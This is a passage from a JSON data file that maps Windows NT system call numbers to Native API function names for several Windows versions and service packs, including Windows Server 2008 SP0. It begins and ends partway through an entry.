"16": "NtEnumerateValueKey", "17": "NtFindAtom", "18": "NtQueryDefaultLocale", "19": "NtQueryKey", "20": "NtQueryValueKey", "21": "NtAllocateVirtualMemory", "22": "NtQueryInformationProcess", "23": "NtWaitForMultipleObjects32", "24": "NtWriteFileGather", "25": "NtSetInformationProcess", "26": "NtCreateKey", "27": "NtFreeVirtualMemory", "28": "NtImpersonateClientOfPort", "29": "NtReleaseMutant", "30": "NtQueryInformationToken", "31": "NtRequestWaitReplyPort", "32": "NtQueryVirtualMemory", "33": "NtOpenThreadToken", "34": "NtQueryInformationThread", "35": "NtOpenProcess", "36": "NtSetInformationFile", "37": "NtMapViewOfSection", "38": "NtAccessCheckAndAuditAlarm", "39": "NtUnmapViewOfSection", "40": "NtReplyWaitReceivePortEx", "41": "NtTerminateProcess", "42": "NtSetEventBoostPriority", "43": "NtReadFileScatter", "44": "NtOpenThreadTokenEx", "45": "NtOpenProcessTokenEx", "46": "NtQueryPerformanceCounter", "47": "NtEnumerateKey", "48": "NtOpenFile", "49": "NtDelayExecution", "50": "NtQueryDirectoryFile", "51": "NtQuerySystemInformation", "52": "NtOpenSection", "53": "NtQueryTimer", "54": "NtFsControlFile", "55": "NtWriteVirtualMemory", "56": "NtCloseObjectAuditAlarm", "57": "NtDuplicateObject", "58": "NtQueryAttributesFile", "59": "NtClearEvent", "60": "NtReadVirtualMemory", "61": "NtOpenEvent", "62": "NtAdjustPrivilegesToken", "63": "NtDuplicateToken", "64": "NtContinue", "65": "NtQueryDefaultUILanguage", "66": "NtQueueApcThread", "67": "NtYieldExecution", "68": "NtAddAtom", "69": "NtCreateEvent", "70": "NtQueryVolumeInformationFile", "71": "NtCreateSection", "72": "NtFlushBuffersFile", "73": "NtApphelpCacheControl", "74": "NtCreateProcessEx", "75": "NtCreateThread", "76": "NtIsProcessInJob", "77": "NtProtectVirtualMemory", "78": "NtQuerySection", "79": "NtResumeThread", "80": "NtTerminateThread", "81": "NtReadRequestData", "82": "NtCreateFile", "83": "NtQueryEvent", "84": "NtWriteRequestData", "85": "NtOpenDirectoryObject", "86": "NtAccessCheckByTypeAndAuditAlarm", "87": "NtQuerySystemTime", "88": "NtWaitForMultipleObjects", "89": "NtSetInformationObject", "90": "NtCancelIoFile", "91": "NtTraceEvent", "92": "NtPowerInformation", "93": "NtSetValueKey", "94": "NtCancelTimer", "95": "NtSetTimer", "96": "NtAcceptConnectPort", "97": "NtAccessCheck", "98": "NtAccessCheckByType", "99": "NtAccessCheckByTypeResultList", "100": "NtAccessCheckByTypeResultListAndAuditAlarm", "101": "NtAccessCheckByTypeResultListAndAuditAlarmByHandle", "102": "NtAcquireCMFViewOwnership", "103": "NtAddBootEntry", "104": "NtAddDriverEntry", "105": "NtAdjustGroupsToken", "106": "NtAlertResumeThread", "107": "NtAlertThread", "108": "NtAllocateLocallyUniqueId", "109": "NtAllocateUserPhysicalPages", "110": "NtAllocateUuids", "111": "NtAlpcAcceptConnectPort", "112": "NtAlpcCancelMessage", "113": "NtAlpcConnectPort", "114": "NtAlpcCreatePort", "115": "NtAlpcCreatePortSection", "116": "NtAlpcCreateResourceReserve", "117": "NtAlpcCreateSectionView", "118": "NtAlpcCreateSecurityContext", "119": "NtAlpcDeletePortSection", "120": "NtAlpcDeleteResourceReserve", "121": "NtAlpcDeleteSectionView", "122": "NtAlpcDeleteSecurityContext", "123": "NtAlpcDisconnectPort", "124": "NtAlpcImpersonateClientOfPort", "125": "NtAlpcOpenSenderProcess", "126": "NtAlpcOpenSenderThread", "127": "NtAlpcQueryInformation", "128": "NtAlpcQueryInformationMessage", "129": "NtAlpcRevokeSecurityContext", "130": "NtAlpcSendWaitReceivePort", "131": "NtAlpcSetInformation", "132": "NtAreMappedFilesTheSame", "133": "NtAssignProcessToJobObject", "134": "NtCancelDeviceWakeupRequest", "135": "NtCancelIoFileEx", "136": "NtCancelSynchronousIoFile", "137": "NtCommitComplete", "138": "NtCommitEnlistment", "139": "NtCommitTransaction", "140": "NtCompactKeys", "141": "NtCompareTokens", "142": "NtCompleteConnectPort", "143": "NtCompressKey", "144": "NtConnectPort", "145": "NtCreateDebugObject", "146": "NtCreateDirectoryObject", "147": "NtCreateEnlistment", "148": "NtCreateEventPair", "149": "NtCreateIoCompletion", "150": "NtCreateJobObject", "151": "NtCreateJobSet", "152": "NtCreateKeyTransacted", "153": "NtCreateKeyedEvent", "154": "NtCreateMailslotFile", "155": "NtCreateMutant", "156": "NtCreateNamedPipeFile", "157": "NtCreatePagingFile", "158": "NtCreatePort", "159": "NtCreatePrivateNamespace", "160": "NtCreateProcess", "161": "NtCreateProfile", "162": "NtCreateResourceManager", "163": "NtCreateSemaphore", "164": "NtCreateSymbolicLinkObject", "165": "NtCreateThreadEx", "166": "NtCreateTimer", "167": "NtCreateToken", "168": "NtCreateTransaction", "169": "NtCreateTransactionManager", "170": "NtCreateUserProcess", "171": "NtCreateWaitablePort", "172": "NtCreateWorkerFactory", "173": "NtDebugActiveProcess", "174": "NtDebugContinue", "175": "NtDeleteAtom", "176": "NtDeleteBootEntry", "177": "NtDeleteDriverEntry", "178": "NtDeleteFile", "179": "NtDeleteKey", "180": "NtDeleteObjectAuditAlarm", "181": "NtDeletePrivateNamespace", "182": "NtDeleteValueKey", "183": "NtDisplayString", "184": "NtEnumerateBootEntries", "185": "NtEnumerateDriverEntries", "186": "NtEnumerateSystemEnvironmentValuesEx", "187": "NtEnumerateTransactionObject", "188": "NtExtendSection", "189": "NtFilterToken", "190": "NtFlushInstallUILanguage", "191": "NtFlushInstructionCache", "192": "NtFlushKey", "193": "NtFlushProcessWriteBuffers", "194": "NtFlushVirtualMemory", "195": "NtFlushWriteBuffer", "196": "NtFreeUserPhysicalPages", "197": "NtFreezeRegistry", "198": "NtFreezeTransactions", "199": "NtGetContextThread", "200": "NtGetCurrentProcessorNumber", "201": "NtGetDevicePowerState", "202": "NtGetMUIRegistryInfo", "203": "NtGetNextProcess", "204": "NtGetNextThread", "205": "NtGetNlsSectionPtr", "206": "NtGetNotificationResourceManager", "207": "NtGetPlugPlayEvent", "208": "NtGetWriteWatch", "209": "NtImpersonateAnonymousToken", "210": "NtImpersonateThread", "211": "NtInitializeNlsFiles", "212": "NtInitializeRegistry", "213": "NtInitiatePowerAction", "214": "NtIsSystemResumeAutomatic", "215": "NtIsUILanguageComitted", "216": "NtListenPort", "217": "NtLoadDriver", "218": "NtLoadKey", "219": "NtLoadKey2", "220": "NtLoadKeyEx", "221": "NtLockFile", "222": "NtLockProductActivationKeys", "223": "NtLockRegistryKey", "224": "NtLockVirtualMemory", "225": "NtMakePermanentObject", "226": "NtMakeTemporaryObject", "227": "NtMapCMFModule", "228": "NtMapUserPhysicalPages", "229": "NtModifyBootEntry", "230": "NtModifyDriverEntry", "231": "NtNotifyChangeDirectoryFile", "232": "NtNotifyChangeKey", "233": "NtNotifyChangeMultipleKeys", "234": "NtOpenEnlistment", "235": "NtOpenEventPair", "236": "NtOpenIoCompletion", "237": "NtOpenJobObject", "238": "NtOpenKeyTransacted", "239": "NtOpenKeyedEvent", "240": "NtOpenMutant", "241": "NtOpenObjectAuditAlarm", "242": "NtOpenPrivateNamespace", "243": "NtOpenProcessToken", "244": "NtOpenResourceManager", "245": "NtOpenSemaphore", "246": "NtOpenSession", "247": "NtOpenSymbolicLinkObject", "248": "NtOpenThread", "249": "NtOpenTimer", "250": "NtOpenTransaction", "251": "NtOpenTransactionManager", "252": "NtPlugPlayControl", "253": "NtPrePrepareComplete", "254": "NtPrePrepareEnlistment", "255": "NtPrepareComplete", "256": "NtPrepareEnlistment", "257": "NtPrivilegeCheck", "258": "NtPrivilegeObjectAuditAlarm", "259": "NtPrivilegedServiceAuditAlarm", "260": "NtPropagationComplete", "261": "NtPropagationFailed", "262": "NtPulseEvent", "263": "NtQueryBootEntryOrder", "264": "NtQueryBootOptions", "265": "NtQueryDebugFilterState", "266": "NtQueryDirectoryObject", "267": "NtQueryDriverEntryOrder", "268": "NtQueryEaFile", "269": "NtQueryFullAttributesFile", "270": "NtQueryInformationAtom", "271": "NtQueryInformationEnlistment", "272": "NtQueryInformationJobObject", "273": "NtQueryInformationPort", "274": "NtQueryInformationResourceManager", "275": "NtQueryInformationTransaction", "276": "NtQueryInformationTransactionManager", "277": "NtQueryInformationWorkerFactory", "278": "NtQueryInstallUILanguage", "279": "NtQueryIntervalProfile", "280": "NtQueryIoCompletion", "281": "NtQueryLicenseValue", "282": "NtQueryMultipleValueKey", "283": "NtQueryMutant", "284": "NtQueryOpenSubKeys", "285": "NtQueryOpenSubKeysEx", "286": "NtQueryPortInformationProcess", "287": "NtQueryQuotaInformationFile", "288": "NtQuerySecurityObject", "289": "NtQuerySemaphore", "290": "NtQuerySymbolicLinkObject", "291": "NtQuerySystemEnvironmentValue", "292": "NtQuerySystemEnvironmentValueEx", "293": "NtQueryTimerResolution", "294": "NtRaiseException", "295": "NtRaiseHardError", "296": "NtReadOnlyEnlistment", "297": "NtRecoverEnlistment", "298": "NtRecoverResourceManager", "299": "NtRecoverTransactionManager", "300": "NtRegisterProtocolAddressInformation", "301": "NtRegisterThreadTerminatePort", "302": "NtReleaseCMFViewOwnership", "303": "NtReleaseKeyedEvent", "304": "NtReleaseWorkerFactoryWorker", "305": "NtRemoveIoCompletionEx", "306": "NtRemoveProcessDebug", "307": "NtRenameKey", "308": "NtRenameTransactionManager", "309": "NtReplaceKey", "310": "NtReplacePartitionUnit", "311": "NtReplyWaitReplyPort", "312": "NtRequestDeviceWakeup", "313": "NtRequestPort", "314": "NtRequestWakeupLatency", "315": "NtResetEvent", "316": "NtResetWriteWatch", "317": "NtRestoreKey", "318": "NtResumeProcess", "319": "NtRollbackComplete", "320": "NtRollbackEnlistment", "321": "NtRollbackTransaction", "322": "NtRollforwardTransactionManager", "323": "NtSaveKey", "324": "NtSaveKeyEx", "325": "NtSaveMergedKeys", "326": "NtSecureConnectPort", "327": "NtSetBootEntryOrder", "328": "NtSetBootOptions", "329": "NtSetContextThread", "330": "NtSetDebugFilterState", "331": "NtSetDefaultHardErrorPort", "332": "NtSetDefaultLocale", "333": "NtSetDefaultUILanguage", "334": "NtSetDriverEntryOrder", "335": "NtSetEaFile", "336": "NtSetHighEventPair", "337": "NtSetHighWaitLowEventPair", "338": "NtSetInformationDebugObject", "339": "NtSetInformationEnlistment", "340": "NtSetInformationJobObject", "341": "NtSetInformationKey", "342": "NtSetInformationResourceManager", "343": "NtSetInformationToken", "344": "NtSetInformationTransaction", "345": "NtSetInformationTransactionManager", "346": "NtSetInformationWorkerFactory", "347": "NtSetIntervalProfile", "348": "NtSetIoCompletion", "349": "NtSetLdtEntries", "350": "NtSetLowEventPair", "351": "NtSetLowWaitHighEventPair", "352": "NtSetQuotaInformationFile", "353": "NtSetSecurityObject", "354": "NtSetSystemEnvironmentValue", "355": "NtSetSystemEnvironmentValueEx", "356": "NtSetSystemInformation", "357": "NtSetSystemPowerState", "358": "NtSetSystemTime", "359": "NtSetThreadExecutionState", "360": "NtSetTimerResolution", "361": "NtSetUuidSeed", "362": "NtSetVolumeInformationFile", "363": "NtShutdownSystem", "364": "NtShutdownWorkerFactory", "365": "NtSignalAndWaitForSingleObject", "366": "NtSinglePhaseReject", "367": "NtStartProfile", "368": "NtStopProfile", "369": "NtSuspendProcess", "370": "NtSuspendThread", "371": "NtSystemDebugControl", "372": "NtTerminateJobObject", "373": "NtTestAlert", "374": "NtThawRegistry", "375": "NtThawTransactions", "376": "NtTraceControl", "377": "NtTranslateFilePath", "378": "NtUnloadDriver", "379": "NtUnloadKey", "380": "NtUnloadKey2", "381": "NtUnloadKeyEx", "382": "NtUnlockFile", "383": "NtUnlockVirtualMemory", "384": "NtVdmControl", "385": "NtWaitForDebugEvent", "386": "NtWaitForKeyedEvent", "387": "NtWaitForWorkViaWorkerFactory", "388": "NtWaitHighEventPair", "389": "NtWaitLowEventPair", "390": "NtWorkerFactoryWorkerReady"}, "SP2": {"0": "NtMapUserPhysicalPagesScatter", "1": "NtWaitForSingleObject", "2": "NtCallbackReturn", "3": "NtReadFile", "4": "NtDeviceIoControlFile", "5": "NtWriteFile", "6": "NtRemoveIoCompletion", "7": "NtReleaseSemaphore", "8": "NtReplyWaitReceivePort", "9": "NtReplyPort", "10": "NtSetInformationThread", "11": "NtSetEvent", "12": "NtClose", "13": "NtQueryObject", "14": "NtQueryInformationFile", "15": "NtOpenKey", "16": "NtEnumerateValueKey", "17": "NtFindAtom", "18": "NtQueryDefaultLocale", "19": "NtQueryKey", "20": "NtQueryValueKey", "21": "NtAllocateVirtualMemory", "22": "NtQueryInformationProcess", "23": "NtWaitForMultipleObjects32", "24": "NtWriteFileGather", "25": "NtSetInformationProcess", "26": "NtCreateKey", "27": "NtFreeVirtualMemory", "28": "NtImpersonateClientOfPort", "29": "NtReleaseMutant", "30": "NtQueryInformationToken", "31": "NtRequestWaitReplyPort", "32": "NtQueryVirtualMemory", "33": "NtOpenThreadToken", "34": "NtQueryInformationThread", "35": "NtOpenProcess", "36": "NtSetInformationFile", "37": "NtMapViewOfSection", "38": "NtAccessCheckAndAuditAlarm", "39": "NtUnmapViewOfSection", "40": "NtReplyWaitReceivePortEx", "41": "NtTerminateProcess", "42": "NtSetEventBoostPriority", "43": "NtReadFileScatter", "44": "NtOpenThreadTokenEx", "45": "NtOpenProcessTokenEx", "46": "NtQueryPerformanceCounter", "47": "NtEnumerateKey", "48": "NtOpenFile", "49": "NtDelayExecution", "50": "NtQueryDirectoryFile", "51": "NtQuerySystemInformation", "52": "NtOpenSection", "53": "NtQueryTimer", "54": "NtFsControlFile", "55": "NtWriteVirtualMemory", "56": "NtCloseObjectAuditAlarm", "57": "NtDuplicateObject", "58": "NtQueryAttributesFile", "59": "NtClearEvent", "60": "NtReadVirtualMemory", "61": "NtOpenEvent", "62": "NtAdjustPrivilegesToken", "63": "NtDuplicateToken", "64": "NtContinue", "65": "NtQueryDefaultUILanguage", "66": "NtQueueApcThread", "67": "NtYieldExecution", "68": "NtAddAtom", "69": "NtCreateEvent", "70": "NtQueryVolumeInformationFile", "71": "NtCreateSection", "72": "NtFlushBuffersFile", "73": "NtApphelpCacheControl", "74": "NtCreateProcessEx", "75": "NtCreateThread", "76": "NtIsProcessInJob", "77": "NtProtectVirtualMemory", "78": "NtQuerySection", "79": "NtResumeThread", "80": "NtTerminateThread", "81": "NtReadRequestData", "82": "NtCreateFile", "83": "NtQueryEvent", "84": "NtWriteRequestData", "85": "NtOpenDirectoryObject", "86": "NtAccessCheckByTypeAndAuditAlarm", "87": "NtQuerySystemTime", "88": "NtWaitForMultipleObjects", "89": "NtSetInformationObject", "90": "NtCancelIoFile", "91": "NtTraceEvent", "92": "NtPowerInformation", "93": "NtSetValueKey", "94": "NtCancelTimer", "95": "NtSetTimer", "96": "NtAcceptConnectPort", "97": "NtAccessCheck", "98": "NtAccessCheckByType", "99": "NtAccessCheckByTypeResultList", "100": "NtAccessCheckByTypeResultListAndAuditAlarm", "101": "NtAccessCheckByTypeResultListAndAuditAlarmByHandle", "102": "NtAcquireCMFViewOwnership", "103": "NtAddBootEntry", "104": "NtAddDriverEntry", "105": "NtAdjustGroupsToken", "106": "NtAlertResumeThread", "107": "NtAlertThread", "108": "NtAllocateLocallyUniqueId", "109": "NtAllocateUserPhysicalPages", "110": "NtAllocateUuids", "111": "NtAlpcAcceptConnectPort", "112": "NtAlpcCancelMessage", "113": "NtAlpcConnectPort", "114": "NtAlpcCreatePort", "115": "NtAlpcCreatePortSection", "116": "NtAlpcCreateResourceReserve", "117": "NtAlpcCreateSectionView", "118": "NtAlpcCreateSecurityContext", "119": "NtAlpcDeletePortSection", "120": "NtAlpcDeleteResourceReserve", "121": "NtAlpcDeleteSectionView", "122": "NtAlpcDeleteSecurityContext", "123": "NtAlpcDisconnectPort", "124": "NtAlpcImpersonateClientOfPort", "125": "NtAlpcOpenSenderProcess", "126": "NtAlpcOpenSenderThread", "127": "NtAlpcQueryInformation", "128": "NtAlpcQueryInformationMessage", "129": "NtAlpcRevokeSecurityContext", "130": "NtAlpcSendWaitReceivePort", "131": "NtAlpcSetInformation", "132": "NtAreMappedFilesTheSame", "133": "NtAssignProcessToJobObject", "134": "NtCancelDeviceWakeupRequest", "135": "NtCancelIoFileEx", "136": "NtCancelSynchronousIoFile", "137": "NtCommitComplete", "138": "NtCommitEnlistment", "139": "NtCommitTransaction", "140": "NtCompactKeys", "141": "NtCompareTokens", "142": "NtCompleteConnectPort", "143": "NtCompressKey", "144": "NtConnectPort", "145": "NtCreateDebugObject", "146": "NtCreateDirectoryObject", "147": "NtCreateEnlistment", "148": "NtCreateEventPair", "149": "NtCreateIoCompletion", "150": "NtCreateJobObject", "151": "NtCreateJobSet", "152": "NtCreateKeyTransacted", "153": "NtCreateKeyedEvent", "154": "NtCreateMailslotFile", "155": "NtCreateMutant", "156": "NtCreateNamedPipeFile", "157": "NtCreatePagingFile", "158": "NtCreatePort", "159": "NtCreatePrivateNamespace", "160": "NtCreateProcess", "161": "NtCreateProfile", "162": "NtCreateResourceManager", "163": "NtCreateSemaphore", "164": "NtCreateSymbolicLinkObject", "165": "NtCreateThreadEx", "166": "NtCreateTimer", "167": "NtCreateToken", "168": "NtCreateTransaction", "169": "NtCreateTransactionManager", "170": "NtCreateUserProcess", "171": "NtCreateWaitablePort", "172": "NtCreateWorkerFactory", "173": "NtDebugActiveProcess", "174": "NtDebugContinue", "175": "NtDeleteAtom", "176": "NtDeleteBootEntry", "177": "NtDeleteDriverEntry", "178": "NtDeleteFile", "179": "NtDeleteKey", "180": "NtDeleteObjectAuditAlarm", "181": "NtDeletePrivateNamespace", "182": "NtDeleteValueKey", "183": "NtDisplayString", "184": "NtEnumerateBootEntries", "185": "NtEnumerateDriverEntries", "186": "NtEnumerateSystemEnvironmentValuesEx", "187": "NtEnumerateTransactionObject", "188": "NtExtendSection", "189": "NtFilterToken", "190": "NtFlushInstallUILanguage", "191": "NtFlushInstructionCache", "192": "NtFlushKey", "193": "NtFlushProcessWriteBuffers", "194": "NtFlushVirtualMemory", "195": "NtFlushWriteBuffer", "196": "NtFreeUserPhysicalPages", "197": "NtFreezeRegistry", "198": "NtFreezeTransactions", "199": "NtGetContextThread", "200": "NtGetCurrentProcessorNumber", "201": "NtGetDevicePowerState", "202": "NtGetMUIRegistryInfo", "203": "NtGetNextProcess", "204": "NtGetNextThread", "205": "NtGetNlsSectionPtr", "206": "NtGetNotificationResourceManager", "207": "NtGetPlugPlayEvent", "208": "NtGetWriteWatch", "209": "NtImpersonateAnonymousToken", "210": "NtImpersonateThread", "211": "NtInitializeNlsFiles", "212": "NtInitializeRegistry", "213": "NtInitiatePowerAction", "214": "NtIsSystemResumeAutomatic", "215": "NtIsUILanguageComitted", "216": "NtListenPort", "217": "NtLoadDriver", "218": "NtLoadKey", "219": "NtLoadKey2", "220": "NtLoadKeyEx", "221": "NtLockFile", "222": "NtLockProductActivationKeys", "223": "NtLockRegistryKey", "224": "NtLockVirtualMemory", "225": "NtMakePermanentObject", "226": "NtMakeTemporaryObject", "227": "NtMapCMFModule", "228": "NtMapUserPhysicalPages", "229": "NtModifyBootEntry", "230": "NtModifyDriverEntry", "231": "NtNotifyChangeDirectoryFile", "232": "NtNotifyChangeKey", "233": "NtNotifyChangeMultipleKeys", "234": "NtOpenEnlistment", "235": "NtOpenEventPair", "236": "NtOpenIoCompletion", "237": "NtOpenJobObject", "238": "NtOpenKeyTransacted", "239": "NtOpenKeyedEvent", "240": "NtOpenMutant", "241": "NtOpenObjectAuditAlarm", "242": "NtOpenPrivateNamespace", "243": "NtOpenProcessToken", "244": "NtOpenResourceManager", "245": "NtOpenSemaphore", "246": "NtOpenSession", "247": "NtOpenSymbolicLinkObject", "248": "NtOpenThread", "249": "NtOpenTimer", "250": "NtOpenTransaction", "251": "NtOpenTransactionManager", "252": "NtPlugPlayControl", "253": "NtPrePrepareComplete", "254": "NtPrePrepareEnlistment", "255": "NtPrepareComplete", "256": "NtPrepareEnlistment", "257": "NtPrivilegeCheck", "258": "NtPrivilegeObjectAuditAlarm", "259": "NtPrivilegedServiceAuditAlarm", "260": "NtPropagationComplete", "261": "NtPropagationFailed", "262": "NtPulseEvent", "263": "NtQueryBootEntryOrder", "264": "NtQueryBootOptions", "265": "NtQueryDebugFilterState", "266": "NtQueryDirectoryObject", "267": "NtQueryDriverEntryOrder", "268": "NtQueryEaFile", "269": "NtQueryFullAttributesFile", "270": "NtQueryInformationAtom", "271": "NtQueryInformationEnlistment", "272": "NtQueryInformationJobObject", "273": "NtQueryInformationPort", "274": "NtQueryInformationResourceManager", "275": "NtQueryInformationTransaction", "276": "NtQueryInformationTransactionManager", "277": "NtQueryInformationWorkerFactory", "278": "NtQueryInstallUILanguage", "279": "NtQueryIntervalProfile", "280": "NtQueryIoCompletion", "281": "NtQueryLicenseValue", "282": "NtQueryMultipleValueKey", "283": "NtQueryMutant", "284": "NtQueryOpenSubKeys", "285": "NtQueryOpenSubKeysEx", "286": "NtQueryPortInformationProcess", "287": "NtQueryQuotaInformationFile", "288": "NtQuerySecurityObject", "289": "NtQuerySemaphore", "290": "NtQuerySymbolicLinkObject", "291": "NtQuerySystemEnvironmentValue", "292": "NtQuerySystemEnvironmentValueEx", "293": "NtQueryTimerResolution", "294": "NtRaiseException", "295": "NtRaiseHardError", "296": "NtReadOnlyEnlistment", "297": "NtRecoverEnlistment", "298": "NtRecoverResourceManager", "299": "NtRecoverTransactionManager", "300": "NtRegisterProtocolAddressInformation", "301": "NtRegisterThreadTerminatePort", "302": "NtReleaseCMFViewOwnership", "303": "NtReleaseKeyedEvent", "304": "NtReleaseWorkerFactoryWorker", "305": "NtRemoveIoCompletionEx", "306": "NtRemoveProcessDebug", "307": "NtRenameKey", "308": "NtRenameTransactionManager", "309": "NtReplaceKey", "310": "NtReplacePartitionUnit", "311": "NtReplyWaitReplyPort", "312": "NtRequestDeviceWakeup", "313": "NtRequestPort", "314": "NtRequestWakeupLatency", "315": "NtResetEvent", "316": "NtResetWriteWatch", "317": "NtRestoreKey", "318": "NtResumeProcess", "319": "NtRollbackComplete", "320": "NtRollbackEnlistment", "321": "NtRollbackTransaction", "322": "NtRollforwardTransactionManager", "323": "NtSaveKey", "324": "NtSaveKeyEx", "325": "NtSaveMergedKeys", "326": "NtSecureConnectPort", "327": "NtSetBootEntryOrder", "328": "NtSetBootOptions", "329": "NtSetContextThread", "330": "NtSetDebugFilterState", "331": "NtSetDefaultHardErrorPort", "332": "NtSetDefaultLocale", "333": "NtSetDefaultUILanguage", "334": "NtSetDriverEntryOrder", "335": "NtSetEaFile", "336": "NtSetHighEventPair", "337": "NtSetHighWaitLowEventPair", "338": "NtSetInformationDebugObject", "339": "NtSetInformationEnlistment", "340": "NtSetInformationJobObject", "341": "NtSetInformationKey", "342": "NtSetInformationResourceManager", "343": "NtSetInformationToken", "344": "NtSetInformationTransaction", "345": "NtSetInformationTransactionManager", "346": "NtSetInformationWorkerFactory", "347": "NtSetIntervalProfile", "348": "NtSetIoCompletion", "349": "NtSetLdtEntries", "350": "NtSetLowEventPair", "351": "NtSetLowWaitHighEventPair", "352": "NtSetQuotaInformationFile", "353": "NtSetSecurityObject", "354": "NtSetSystemEnvironmentValue", "355": "NtSetSystemEnvironmentValueEx", "356": "NtSetSystemInformation", "357": "NtSetSystemPowerState", "358": "NtSetSystemTime", "359": "NtSetThreadExecutionState", "360": "NtSetTimerResolution", "361": "NtSetUuidSeed", "362": "NtSetVolumeInformationFile", "363": "NtShutdownSystem", "364": "NtShutdownWorkerFactory", "365": "NtSignalAndWaitForSingleObject", "366": "NtSinglePhaseReject", "367": "NtStartProfile", "368": "NtStopProfile", "369": "NtSuspendProcess", "370": "NtSuspendThread", "371": "NtSystemDebugControl", "372": "NtTerminateJobObject", "373": "NtTestAlert", "374": "NtThawRegistry", "375": "NtThawTransactions", "376": "NtTraceControl", "377": "NtTranslateFilePath", "378": "NtUnloadDriver", "379": "NtUnloadKey", "380": "NtUnloadKey2", "381": "NtUnloadKeyEx", "382": "NtUnlockFile", "383": "NtUnlockVirtualMemory", "384": "NtVdmControl", "385": "NtWaitForDebugEvent", "386": "NtWaitForKeyedEvent", "387": "NtWaitForWorkViaWorkerFactory", "388": "NtWaitHighEventPair", "389": "NtWaitLowEventPair", "390": "NtWorkerFactoryWorkerReady"}}, "Windows Server 2008": {"SP0": {"0": "NtMapUserPhysicalPagesScatter", "1": "NtWaitForSingleObject", "2": "NtCallbackReturn", "3": "NtReadFile", "4": "NtDeviceIoControlFile", "5": "NtWriteFile", "6": "NtRemoveIoCompletion", "7": "NtReleaseSemaphore", "8": "NtReplyWaitReceivePort", "9": "NtReplyPort", "10": "NtSetInformationThread", "11": "NtSetEvent", "12": "NtClose", "13": "NtQueryObject", "14": "NtQueryInformationFile", "15": "NtOpenKey", "16": "NtEnumerateValueKey", "17": "NtFindAtom", "18": "NtQueryDefaultLocale", "19": "NtQueryKey", "20": "NtQueryValueKey", "21": "NtAllocateVirtualMemory", "22": "NtQueryInformationProcess", "23": "NtWaitForMultipleObjects32", "24": "NtWriteFileGather", "25": "NtSetInformationProcess", "26": "NtCreateKey", "27": "NtFreeVirtualMemory", "28": "NtImpersonateClientOfPort", "29": "NtReleaseMutant", "30": "NtQueryInformationToken", "31": "NtRequestWaitReplyPort", "32": "NtQueryVirtualMemory", "33": "NtOpenThreadToken", "34": "NtQueryInformationThread", "35": "NtOpenProcess", "36": "NtSetInformationFile", "37": "NtMapViewOfSection", "38": "NtAccessCheckAndAuditAlarm", "39": "NtUnmapViewOfSection", "40": "NtReplyWaitReceivePortEx", "41": "NtTerminateProcess", "42": "NtSetEventBoostPriority", "43": "NtReadFileScatter", "44": "NtOpenThreadTokenEx", "45": "NtOpenProcessTokenEx", "46": "NtQueryPerformanceCounter", "47": "NtEnumerateKey", "48": "NtOpenFile", "49": "NtDelayExecution", "50": "NtQueryDirectoryFile", "51": "NtQuerySystemInformation", "52": "NtOpenSection", "53": "NtQueryTimer", "54": "NtFsControlFile", "55": "NtWriteVirtualMemory", "56": "NtCloseObjectAuditAlarm", "57": "NtDuplicateObject", "58": "NtQueryAttributesFile", "59": "NtClearEvent", "60": "NtReadVirtualMemory", "61": "NtOpenEvent", "62": "NtAdjustPrivilegesToken", "63": "NtDuplicateToken", "64": "NtContinue", "65": "NtQueryDefaultUILanguage", "66": "NtQueueApcThread", "67": "NtYieldExecution", "68": "NtAddAtom", "69": "NtCreateEvent", "70": "NtQueryVolumeInformationFile", "71": "NtCreateSection", "72": "NtFlushBuffersFile", "73": "NtApphelpCacheControl", "74": "NtCreateProcessEx", "75": "NtCreateThread", "76": "NtIsProcessInJob", "77": "NtProtectVirtualMemory", "78": "NtQuerySection", "79": "NtResumeThread", "80": "NtTerminateThread", "81": "NtReadRequestData", "82": "NtCreateFile", "83": "NtQueryEvent", "84": "NtWriteRequestData", "85": "NtOpenDirectoryObject", "86": "NtAccessCheckByTypeAndAuditAlarm", "87": "NtQuerySystemTime", "88": "NtWaitForMultipleObjects", "89": "NtSetInformationObject", "90": "NtCancelIoFile", "91": "NtTraceEvent", "92": "NtPowerInformation", "93": "NtSetValueKey", "94": "NtCancelTimer", "95": "NtSetTimer", "96": "NtAcceptConnectPort", "97": "NtAccessCheck", "98": "NtAccessCheckByType", "99": "NtAccessCheckByTypeResultList", "100": "NtAccessCheckByTypeResultListAndAuditAlarm", "101": "NtAccessCheckByTypeResultListAndAuditAlarmByHandle", "102": "NtAcquireCMFViewOwnership", "103": "NtAddBootEntry", "104": "NtAddDriverEntry", "105": "NtAdjustGroupsToken", "106": "NtAlertResumeThread", "107": "NtAlertThread", "108": "NtAllocateLocallyUniqueId", "109": "NtAllocateUserPhysicalPages", "110": "NtAllocateUuids", "111": "NtAlpcAcceptConnectPort", "112": "NtAlpcCancelMessage", "113": "NtAlpcConnectPort", "114": "NtAlpcCreatePort", "115": "NtAlpcCreatePortSection", "116": "NtAlpcCreateResourceReserve", "117": "NtAlpcCreateSectionView", "118": "NtAlpcCreateSecurityContext", "119": "NtAlpcDeletePortSection", "120": "NtAlpcDeleteResourceReserve", "121": "NtAlpcDeleteSectionView", "122": "NtAlpcDeleteSecurityContext", "123": "NtAlpcDisconnectPort", "124": "NtAlpcImpersonateClientOfPort", "125": "NtAlpcOpenSenderProcess", "126": "NtAlpcOpenSenderThread", "127": "NtAlpcQueryInformation", "128": "NtAlpcQueryInformationMessage", "129": "NtAlpcRevokeSecurityContext", "130": "NtAlpcSendWaitReceivePort", "131": "NtAlpcSetInformation", "132": "NtAreMappedFilesTheSame", "133": "NtAssignProcessToJobObject", "134": "NtRequestDeviceWakeup", "135": "NtCancelIoFileEx", "136": "NtCancelSynchronousIoFile", "137": "NtCommitComplete", "138": "NtCommitEnlistment", "139": "NtCommitTransaction", "140": "NtCompactKeys", "141": "NtCompareTokens", "142": "NtCompleteConnectPort", "143": "NtCompressKey", "144": "NtConnectPort", "145": "NtCreateDebugObject", "146": "NtCreateDirectoryObject", "147": "NtCreateEnlistment", "148": "NtCreateEventPair", "149": "NtCreateIoCompletion", "150": "NtCreateJobObject", "151": "NtCreateJobSet", "152": "NtCreateKeyTransacted", "153": "NtCreateKeyedEvent", "154": "NtCreateMailslotFile", "155": "NtCreateMutant", "156": "NtCreateNamedPipeFile", "157": "NtCreatePagingFile", "158": "NtCreatePort", "159": "NtCreatePrivateNamespace", "160": "NtCreateProcess", "161": "NtCreateProfile", "162": "NtCreateResourceManager", "163": "NtCreateSemaphore", "164": "NtCreateSymbolicLinkObject", "165": "NtCreateThreadEx", "166": "NtCreateTimer", "167": "NtCreateToken", "168": "NtCreateTransaction", "169": "NtCreateTransactionManager", "170": 